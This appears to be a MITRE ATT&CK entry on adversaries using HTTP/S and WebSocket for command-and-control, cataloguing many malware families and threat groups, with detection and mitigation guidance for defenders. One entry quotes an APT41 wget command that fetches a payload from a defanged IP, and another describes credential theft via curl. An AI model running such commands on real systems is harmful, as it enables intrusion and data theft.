Application Layer Protocol: Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S[1] and WebSocket[2] that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

ID: T1071.001
Sub-technique of:  T1071
Platforms: Linux, Windows, macOS
Contributors: TruKno
Version: 1.2
Created: 15 March 2020
Last Modified: 29 September 2023

Procedure Examples

ID Name Description
C0028 2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. [3]

S0066 3PARA RAT

3PARA RAT uses HTTP for command and control.[1]

S0065 4H RAT

4H RAT uses HTTP for command and control.[1]

S0469 ABK

ABK has the ability to use HTTP in communications with C2.[4]

S1028 Action RAT

Action RAT can use HTTP to communicate with C2 servers.[5]

S0045 ADVSTORESHELL

ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.[6]

S0331 Agent Tesla

Agent Tesla has used HTTP for C2 communications.[7][8]

S1025 Amadey

Amadey has used HTTP for C2 communications.[9]

S0504 Anchor

Anchor has used HTTP and HTTPS in C2 communications.[10]

S1074 ANDROMEDA

ANDROMEDA has the ability to make GET requests to download files from C2.[11]

S0584 AppleJeus

AppleJeus has sent data to its C2 server via POST requests.[12][13]

S0622 AppleSeed

AppleSeed has the ability to communicate with C2 over HTTP.[14][15]

G0026 APT18

APT18 uses HTTP for C2 communications.[16]

G0073 APT19

APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.[17][18]

G0007 APT28

Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.[19][20]

G0050 APT32

APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.[21][22]

G0064 APT33

APT33 has used HTTP for command and control.[23]

G0067 APT37

APT37 uses HTTPS to conceal C2 communications.[24]

G0082 APT38

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.[25]

G0087 APT39

APT39 has used HTTP in communications with C2.[26][27]

G0096 APT41

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[28]

S0456 Aria-body

Aria-body has used HTTP in C2 communications.[29]

S1029 AuTo Stealer

AuTo Stealer can use HTTP to communicate with its C2 servers.[5]

S0473 Avenger

Avenger has the ability to use HTTP in communication with C2.[4]

S0475 BackConfig

BackConfig has the ability to use HTTPS for C2 communiations.[30]

S0031 BACKSPACE

BACKSPACE uses HTTP as a transport to communicate with its command server.[31]

S1081 BADHATCH

BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.[32][33]

S0128 BADNEWS

BADNEWS establishes a backdoor over HTTP.[34]

S0337 BadPatch

BadPatch uses HTTP for C2.[35]

S0239 Bankshot

Bankshot uses HTTP for command and control communication.[36]

S0534 Bazar

Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.[37][38][39]

S0470 BBK

BBK has the ability to use HTTP in communications with C2.[4]

S0127 BBSRAT

BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.[40]

S0268 Bisonal

Bisonal has used HTTP for C2 communications.[41][42]

G1002 BITTER

BITTER has used HTTP POST requests for C2.[43][44]

S0089 BlackEnergy

BlackEnergy communicates with its C2 server over HTTP.[45]

S0564 BlackMould

BlackMould can send commands to C2 in the body of HTTP POST requests.[46]

S0520 BLINDINGCAN

BLINDINGCAN has used HTTPS over port 443 for command and control.[47]

S0657 BLUELIGHT

BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.[48]

S0635 BoomBox

BoomBox has used HTTP POST requests for C2.[49]

G0060 BRONZE BUTLER

BRONZE BUTLER malware has used HTTP for C2.[50]

S1063 Brute Ratel C4

Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.[51][52]

S0043 BUBBLEWRAP

BUBBLEWRAP can communicate using HTTP or HTTPS.[53]

S0482 Bundlore

Bundlore uses HTTP requests for C2.[54]

C0017 C0017

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[55]

C0018 C0018

During C0018, the threat actors used HTTP for C2 communications.[56]

C0021 C0021

During C0021, the threat actors used HTTP for some of their C2 communications.[57]

S0030 Carbanak

The Carbanak malware communicates to its command server using HTTP with an encrypted payload.[58]

S0484 Carberp

Carberp has connected to C2 servers via HTTP.[59]

S0335 Carbon

Carbon can use HTTP in C2 communications.[60]

S0348 Cardinal RAT

Cardinal RAT is downloaded using HTTP over port 443.[61]

S0631 Chaes

Chaes has used HTTP for C2 communications.[62]

S0674 CharmPower

CharmPower can use HTTP to communicate with C2.[63]

S0144 ChChes

ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.[64][65]

G0114 Chimera

Chimera has used HTTPS for C2 communications.[66]

S0020 China Chopper

China Chopper's server component executes code sent via HTTP POST commands.[67]

S0023 CHOPSTICK

Various implementations of CHOPSTICK communicate with C2 over HTTP.[68]

S0660 Clambling

Clambling has the ability to communicate over HTTP.[69]

S0054 CloudDuke

One variant of CloudDuke uses HTTP and HTTPS for C2.[70]

G0080 Cobalt Group

Cobalt Group has used HTTPS for C2.[71][72][73]

S0154 Cobalt Strike

Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.[74][75][76][77]

S0244 Comnie

Comnie uses HTTP for C2 communication.[78]

S0126 ComRAT

ComRAT has used HTTP requests for command and control.[79][80][81]

G0142 Confucius

Confucius has used HTTP for C2 communications.[82]

S0137 CORESHELL

CORESHELL can communicate over HTTP for C2.[19][83]

S0050 CosmicDuke

CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.[70][84]

S0046 CozyCar

CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.[85]

S1023 CreepyDrive

CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.[86]

S1024 CreepySnail

CreepySnail can use HTTP for C2.[86]

S0115 Crimson

Crimson can use a HTTP GET request to download its final payload.[87]

S0538 Crutch

Crutch has conducted C2 communications with a Dropbox account using the HTTP API.[88]

S0527 CSPY Downloader

CSPY Downloader can use GET requests to download additional payloads from C2.[89]

S0687 Cyclops Blink

Cyclops Blink can download files via HTTP and HTTPS.[90][91]

S0497 Dacls

Dacls can use HTTPS in C2 communications.[92][93]

S1014 DanBot

DanBot can use HTTP in C2 communication.[94]

G0070 Dark Caracal

Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string "&&&".[95]

S0334 DarkComet

DarkComet can use HTTP for C2 communications.[96]

S1066 DarkTortilla

DarkTortilla has used HTTP and HTTPS for C2.[97]

S0673 DarkWatchman

DarkWatchman uses HTTPS for command and control.[98]

S0187 Daserf

Daserf uses HTTP for C2.[50]

S0243 DealersChoice

DealersChoice uses HTTP for communication with the C2 server.[99]

S0616 DEATHRANSOM

DEATHRANSOM can use HTTPS to download files.[100]

S0659 Diavol

Diavol has used HTTP GET and POST requests for C2.[101]

S0200 Dipsind

Dipsind uses HTTP for C2.[102]

S0600 Doki

Doki has communicated with C2 over HTTPS.[103]

S0695 Donut

Donut can use HTTP to download previously staged shellcode payloads.[104]

S0472 down_new

down_new has the ability to use HTTP in C2 communications.[4]

S0186 DownPaper

DownPaper communicates to its C2 server over HTTP.[105]

S0694 DRATzarus

DRATzarus can use HTTP or HTTPS for C2 communications.[106]

S0384 Dridex

Dridex has used POST requests and HTTPS for C2 communications.[107][108]

S0502 Drovorub

Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.[109]

S0062 DustySky

DustySky has used both HTTP and HTTPS for C2.[110]

S0024 Dyre

Dyre uses HTTPS for C2 communications.[111][112]

S0554 Egregor

Egregor has communicated with its C2 servers via HTTPS protocol.[113]

S0081 Elise

Elise communicates over HTTP or HTTPS for C2.[114]

S0064 ELMER

ELMER uses HTTP for command and control.[115]

S0082 Emissary

Emissary uses HTTP or HTTPS for C2.[116]

S0367 Emotet

Emotet has used HTTP for command and control.[117]

S0363 Empire

Empire can conduct command and control over protocols like HTTP and HTTPS.[118]

S0091 Epic

Epic uses HTTP and HTTPS for C2 communications.[119][120]

S0396 EvilBunny

EvilBunny has executed C2 commands directly via HTTP.[121]

S0401 Exaramel for Linux

Exaramel for Linux uses HTTPS for C2 communications.[122][123]

S0569 Explosive

Explosive has used HTTP for communication.[124]

S0512 FatDuke

FatDuke can be controlled via a custom C2 protocol over HTTP.[125]

S0171 Felismus

Felismus uses HTTP for C2.[126]

S0267 FELIXROOT

FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.[127][128]

G1016 FIN13

FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.[129][130]

G0085 FIN4

FIN4 has used HTTP POST requests to transmit data.[131][132]

G0061 FIN8

FIN8 has used HTTPS for command and control.[133]

S0355 Final1stspy

Final1stspy uses HTTP for C2.[134]

S0696 Flagpro

Flagpro can communicate with its C2 using HTTP.[135]

S0381 FlawedAmmyy

FlawedAmmyy has used HTTP for C2.[136]

S0661 FoggyWeb

FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.[137]

C0001 Frankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.[138]

G0047 Gamaredon Group

Gamaredon Group has used HTTP and HTTPS for C2 communications.[139][140][141][142][143][144]

S0168 Gazer

Gazer communicates with its C2 servers over HTTP.[145]

S0666 Gelsemium

Gelsemium can use HTTP/S in C2 communications.[146]

S0049 GeminiDuke

GeminiDuke uses HTTP and HTTPS for command and control.[70]

S0460 Get2

Get2 has the ability to use HTTP to send information collected from an infected host to C2.[147]

S0249 Gold Dragon

Gold Dragon uses HTTP for communication to the control servers.[148]

S0493 GoldenSpy

GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.[149]

S0597 GoldFinder

GoldFinder has used HTTP for C2.[150]

S0588 GoldMax

GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.[150][151]

S0477 Goopy

Goopy has the ability to communicate with its C2 over HTTP.[22]

S0531 Grandoreiro

Grandoreiro has the ability to use HTTP in C2 communications.[152][153]

S0237 GravityRAT

GravityRAT uses HTTP for C2.[154]

S0342 GreyEnergy

GreyEnergy uses HTTP and HTTPS for C2 communications.[128]

S0632 GrimAgent

GrimAgent has the ability to use HTTP for C2 communications.[155]

S0561 GuLoader

GuLoader can use HTTP to retrieve additional binaries.[156][157]

G0125 HAFNIUM

HAFNIUM has used open-source C2 frameworks, including Covenant.[158]

S0037 HAMMERTOSS

The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.[159]

S0391 HAWKBALL

HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.[160]

S0170 Helminth

Helminth can use HTTP for C2.[161]

S0087 Hi-Zor

Hi-Zor communicates with its C2 server over HTTPS.[162]

G0126 Higaisa

Higaisa used HTTP and HTTPS to send data back to its C2 server.[163][164]

S0009 Hikit

Hikit has used HTTP for C2.[165]

S0070 HTTPBrowser

HTTPBrowser has used HTTP and HTTPS for command and control.[166][167]

S0068 httpclient

httpclient uses HTTP for command and control.[1]

S0398 HyperBro

HyperBro has used HTTPS for C2 communications.[168]

S1022 IceApple

IceApple can use HTTP GET to request and pull information from C2.[169]

S0483 IcedID

IcedID has used HTTPS in communications with C2.[170]

G0100 Inception

Inception has used HTTP, HTTPS, and WebDav in network communications.[171][172]

S0604 Industroyer

Industroyer’s main backdoor connected to a remote C2 server using HTTPS.[173]

S0260 InvisiMole

InvisiMole uses HTTP for C2 communications.[174]

S0015 Ixeshe

Ixeshe uses HTTP for command and control.[175][176]

S0044 JHUHUGIT

JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.[177][178][179]

S0265 Kazuar

Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.[180]

G0004 Ke3chang

Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.[181][182]

S1020 Kevin

Variants of Kevin can communicate with C2 over HTTP.[183]

S0276 Keydnap

Keydnap uses HTTPS for command and control.[184]

S1051 KEYPLUG

KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.[55]

S0526 KGH_SPY

KGH_SPY can send data to C2 with HTTP POST requests.[89]

G0094 Kimsuky

Kimsuky has used HTTP GET and POST requests for C2.[185]

S0599 Kinsing

Kinsing has communicated with C2 over HTTP.[186]

S0250 Koadic

Koadic has used HTTP for C2 communications.[187]

S0162 Komplex

The Komplex C2 channel uses HTTP POST requests.[188]

S0356 KONNI

KONNI has used HTTP POST for C2.[189][190]

S1075 KOPILUWAK

KOPILUWAK has used HTTP POST requests to send data to C2.[11]

G0032 Lazarus Group

Lazarus Group has conducted C2 over HTTP and HTTPS.[191][92][93][192][193][194]

S0513 LiteDuke

LiteDuke can use HTTP GET requests in C2 communications.[125]

S0680 LitePower

LitePower can use HTTP and HTTPS for C2 communications.[195]

S0447 Lokibot

Lokibot has used HTTP for C2 communications.[196][197]

S0582 LookBack

LookBack’s C2 proxy tool sends data to a C2 server over HTTP.[198]

S0042 LOWBALL

LOWBALL command and control occurs via HTTPS over port 443.[53]

G1014 LuminousMoth

LuminousMoth has used HTTP for C2.[199]

S0409 Machete

Machete uses HTTP for Command & Control.[200][201][202]

S0282 MacSpy

MacSpy uses HTTP for command and control.[203]

S1060 Mafalda

Mafalda can use HTTP for C2.[204]

G0059 Magic Hound

Magic Hound has used HTTP for C2.[205][206][207]

S0652 MarkiRAT

MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.[208]

S0449 Maze

Maze has communicated to hard-coded IP addresses via HTTP.[209]

S0500 MCMD

MCMD can use HTTPS in communication with C2 web servers.[210]

S0459 MechaFlounder

MechaFlounder has the ability to use HTTP in communication with C2.[211]

G1013 Metador

Metador has used HTTP for C2.[204]

S1059 metaMain

metaMain can use HTTP for C2 communications.[204][212]

S0455 Metamorfo

Metamorfo has used HTTP for C2.[213][214]

S0339 Micropsia

Micropsia uses HTTP and HTTPS for C2 network communications.[215][216]

S1015 Milan

Milan can use HTTPS for communication with C2.[217][183][218]

S0051 MiniDuke

MiniDuke uses HTTP and HTTPS for command and control.[70][125]

S0084 Mis-Type

Mis-Type network traffic can communicate over HTTP.[219]

S1026 Mongall

Mongall can use HTTP for C2 communication.[220]

S0284 More_eggs

More_eggs uses HTTPS for C2.[71][221]

S1047 Mori

Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.[222]

G0069 MuddyWater

MuddyWater has used HTTP for C2 communications.[223][224]

G0129 Mustang Panda

Mustang Panda has communicated with its C2 via HTTP POST requests.[225][226][227][228]

S0699 Mythic

Mythic supports HTTP-based C2 profiles.[229]

S0691 Neoichor

Neoichor can use HTTP for C2 communications.[182]

S0034 NETEAGLE

NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.[31]

S0198 NETWIRE

NETWIRE has the ability to communicate over HTTP.[230][231]

C0002 Night Dragon

During Night Dragon, threat actors used HTTP for C2.[232]

S0385 njRAT

njRAT has used HTTP for C2 communications.[233]

S0353 NOKKI

NOKKI has used HTTP for C2 communications.[234]

S0340 Octopus

Octopus has used HTTP GET and POST requests for C2 communications.[235][236]

G0049 OilRig

OilRig has used HTTP for C2.[237][238][239]

S0439 Okrum

Okrum uses HTTP for communication with its C2.[240]

S0138 OLDBAIT

OLDBAIT can use HTTP for C2.[19]

S0052 OnionDuke

OnionDuke uses HTTP and HTTPS for C2.[70]

S0264 OopsIE

OopsIE uses HTTP for C2 communications.[241][242]

C0012 Operation CuckooBees

During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.[243]

C0022 Operation Dream Job

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.[244]

C0014 Operation Wocao

During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.[245]

G0071 Orangeworm

Orangeworm has used HTTP for C2.[246]

S0352 OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D can also use use HTTP POST and GET requests to send and receive C2 information.[247]

S0594 Out1

Out1 can use HTTP and HTTPS in communications with remote hosts.[224]

S1017 OutSteel

OutSteel has used HTTP for C2 communications.[248]

S0072 OwaAuth

OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.[166]

S0598 P.A.S. Webshell

P.A.S. Webshell can issue commands via HTTP POST.[123]

S0664 Pandora

Pandora can communicate over HTTP.[249]

S1050 PcShare

PcShare has used HTTP for C2 communication.[250]

S0643 Peppy

Peppy can use HTTP to communicate with C2.[87]

S0048 PinchDuke

PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.[70]

S1031 PingPull

A PingPull variant can communicate with its C2 servers by using HTTPS.[251]

S0435 PLEAD

PLEAD has used HTTP for communications with command and control (C2) servers.[252][253]

S0013 PlugX

PlugX can be configured to use HTTP for command and control.[166][254]

S0067 pngdowner

pngdowner uses HTTP for command and control.[1]

S0428 PoetRAT

PoetRAT has used HTTP and HTTPs for C2 communications.[255]

S0518 PolyglotDuke

PolyglotDuke has has used HTTP GET requests in C2 communications.[125]

S0453 Pony

Pony has sent collected information to the C2 via HTTP POST request.[256]

S0378 PoshC2

PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.[257]

S0441 PowerShower

PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.[172]

S0371 POWERTON

POWERTON has used HTTP/HTTPS for C2 traffic.[258]

S1046 PowGoop

PowGoop can send HTTP GET requests to malicious servers.[259]

S0184 POWRUNER

POWRUNER can use HTTP for C2 communications.[260][238]

S0238 Proxysvc

Proxysvc uses HTTP over SSL to communicate commands with the control server.[261]

S0078 Psylo

Psylo uses HTTPS for C2.[262]

S0147 Pteranodon

Pteranodon can use HTTP for C2.[139]

S0196 PUNCHBUGGY

PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.[263][264][265]

S0192 Pupy

Pupy can communicate over HTTP for C2.[266]

S0650 QakBot

QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.[267][268][269]

S0269 QUADAGENT

QUADAGENT uses HTTPS and HTTP for C2 communications.[270]

S1076 QUIETCANARY

QUIETCANARY can use HTTPS for C2 communications.[11]

S0686 QuietSieve

QuietSieve can use HTTPS in C2 communications.[271]

S0629 RainyDay

RainyDay can use HTTP in C2 communications.[272]

S0458 Ramsay

Ramsay has used HTTP for C2.[273]

G0075 Rancor

Rancor has used HTTP for C2.[274]

S0241 RATANKBA

RATANKBA uses HTTP/HTTPS for command and control communication.[275][276]

S0662 RCSession

RCSession can use HTTP in C2 communications.[69][277]

S0495 RDAT

RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.[278]

S0172 Reaver

Some Reaver variants use HTTP for C2.[279]

S0153 RedLeaves

RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.[280][281]

S0019 Regin

The Regin malware platform supports many standard protocols, including HTTP and HTTPS.[282]

S0375 Remexi

Remexi uses BITSAdmin to communicate with the C2 server over HTTP.[283]

S0125 Remsec

Remsec is capable of using HTTP and HTTPS for C2.[284][285][286]

S0496 REvil

REvil has used HTTP and HTTPS in communication with C2.[287][288][289][290][291]

S0258 RGDoor

RGDoor uses HTTP for C2 communications.[292]

S0003 RIPTIDE

APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.[293]

S0448 Rising Sun

Rising Sun has used HTTP and HTTPS for command and control.[294]

G0106 Rocke

Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.[295]

S0240 ROKRAT

ROKRAT can use HTTP and HTTPS for command and control communication.[296][297][298]

S0148 RTM

RTM has initiated connections to external domains using HTTPS.[299]

S0085 S-Type

S-Type uses HTTP for C2.[219]

S1018 Saint Bot

Saint Bot has used HTTP for C2 communications.[300]

S0074 Sakula

Sakula uses HTTP for C2.[301]

G0034 Sandworm Team

Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.[302]

S0053 SeaDuke

SeaDuke uses HTTP and HTTPS for C2.[70]

S0345 Seasalt

Seasalt uses HTTP for C2 communications.[303]

S0382 ServHelper

ServHelper uses HTTP for C2.[304]

S0596 ShadowPad

ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.[305]

S0140 Shamoon

Shamoon has used HTTP for C2.[306]

S1019 Shark

Shark has the ability to use HTTP in C2 communications.[217][218]

S0444 ShimRat

ShimRat communicated over HTTP and HTTPS with C2 servers.[307]

S0445 ShimRatReporter

ShimRatReporter communicated over HTTP with preconfigured C2 servers.[307]

S0589 Sibot

Sibot communicated with its C2 server via HTTP GET requests.[150]

S0610 SideTwist

SideTwist has used HTTP GET and POST requests over port 443 for C2.[308]

G0121 Sidewinder

Sidewinder has used HTTP in C2 communications.[309][310][311]

G0083 SilverTerrier

SilverTerrier uses HTTP for C2 communications.[312]

S0633 Sliver

Sliver has the ability to support C2 communications over HTTP/S.[313][314][315]

S0533 SLOTHFULMEDIA

SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.[316]

S1035 Small Sieve

Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.[222]

S0226 Smoke Loader

Smoke Loader uses HTTP for C2.[317]

S0649 SMOKEDHAM

SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.[318]

S0159 SNUGRIDE

SNUGRIDE communicates with its C2 server over HTTP.[280]

C0024 SolarWinds Compromise

During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.[319]

S0516 SoreFang

SoreFang can use HTTP in C2 communications.[320][321]

S0543 Spark

Spark has used HTTP POST requests to communicate with its C2 server to receive commands.[322]

S0374 SpeakUp

SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. [323]

S1030 Squirrelwaffle

Squirrelwaffle has used HTTP POST requests for C2 communications.[324]

S1037 STARWHALE

STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.[325][222]

G0038 Stealth Falcon

Stealth Falcon malware communicates with its C2 server via HTTPS.[326]

S0491 StrongPity

StrongPity can use HTTP and HTTPS in C2 communications.[327][328]

S0603 Stuxnet

Stuxnet uses HTTP to communicate with a command and control server. [329]

S1042 SUGARDUMP

A SUGARDUMP variant has used HTTP for C2.[330]

S0559 SUNBURST

SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.[331]

S0578 SUPERNOVA

SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.[332][333]

S1064 SVCReady

SVCReady can communicate with its C2 servers via HTTP.[334]

S0060 Sys10

Sys10 uses HTTP for C2.[335]

G0092 TA505

TA505 has used HTTP to communicate with C2 nodes.[336]

G0127 TA551

TA551 has used HTTP for C2 communications.[337]

S0011 Taidoor

Taidoor has used HTTP GET and POST requests for C2.[338]

G0139 TeamTNT

TeamTNT has the curl command to send credentials over HTTP and the curl and wget commands to download new software.[339][340][341] TeamTNT has also used a custom user agent HTTP header in shell scripts.[342]

S0595 ThiefQuest

ThiefQuest uploads files via unencrypted HTTP. [343][344]

G0027 Threat Group-3390

Threat Group-3390 malware has used HTTP for C2.[345]

S0668 TinyTurla

TinyTurla can use HTTPS in C2 communications.[346]

S0671 Tomiris

Tomiris can use HTTP to establish C2 communications.[347]

S0678 Torisma

Torisma can use HTTP and HTTPS for C2 communications.[348]

S0682 TrailBlazer

TrailBlazer has used HTTP requests for C2.[349]

S0266 TrickBot

TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.[350][10]

S0094 Trojan.Karagany

Trojan.Karagany can communicate with C2 via HTTP POST requests.[351]

G0081 Tropic Trooper

Tropic Trooper has used HTTP in communication with the C2.[352][353]

S0436 TSCookie

TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.[354][355]

S0647 Turian

Turian has the ability to use HTTP for its C2.[356]

G0010 Turla

Turla has used HTTP and HTTPS for C2 communications.[357][358]

S0333 UBoatRAT

UBoatRAT has used HTTP for C2 communications.[359]

S0275 UPPERCUT

UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.[360]

S0022 Uroburos

Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.[361]

S0386 Ursnif

Ursnif has used HTTPS for C2.[362][363][364]

S0476 Valak

Valak has used HTTP in communications with C2.[365][337]

S0636 VaporRage

VaporRage can use HTTP to download shellcode from compromised websites.[49]

S0207 Vasport

Vasport creates a backdoor by making a connection using a HTTP POST.[366]

S0442 VBShower

VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.[367]

S0257 VERMIN

VERMIN uses HTTP for C2 communications.[368]

S0514 WellMess

WellMess can use HTTP and HTTPS in C2 communications.[369][370][371][321]

S0689 WhisperGate

WhisperGate can make an HTTPS connection to download additional files.[372][373]

G0112 Windshift

Windshift has used tools that communicate with C2 over HTTP.[374]

S0466 WindTail

WindTail has the ability to use HTTP for C2 communications.[375]

S0059 WinMM

WinMM uses HTTP for C2.[335]

S0430 Winnti for Linux

Winnti for Linux has used HTTP in outbound communications.[376]

S0141 Winnti for Windows

Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.[377]

G0090 WIRTE

WIRTE has used HTTP for network communication.[378]

G0102 Wizard Spider

Wizard Spider has used HTTP for network communications.[379]

S1065 Woody RAT

Woody RAT can communicate with its C2 server using HTTP requests.[380]

S0341 Xbash

Xbash uses HTTP for C2 communications.[381]

S0653 xCaon

xCaon has communicated with the C2 server by sending POST requests over HTTP.[382]

S0388 YAHOYAH

YAHOYAH uses HTTP for C2.[383]

S0251 Zebrocy

Zebrocy uses HTTP for C2.[384][385][386][387][388][389]

S0230 ZeroT

ZeroT has used HTTP for C2.[390][391]

S0330 Zeus Panda

Zeus Panda uses HTTP for C2 communications.[392]

S0086 ZLib

ZLib communicates over HTTP for C2.[219]

S0412 ZxShell

ZxShell has used HTTP for C2 connections.[393]

Mitigations

ID Mitigation Description
M1031 Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Detection

ID Data Source Data Component Detects
DS0029 Network Traffic Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic Flow

Monitor for web traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

References

  1. Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
  2. Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.
  3. Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22
  4. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
  5. Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.
  6. Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
  7. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
  8. Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.
  9. Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.
  10. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
  11. Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.
  12. Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.
  13. Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.
  14. Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.
  15. KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.
  16. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
  17. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
  18. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
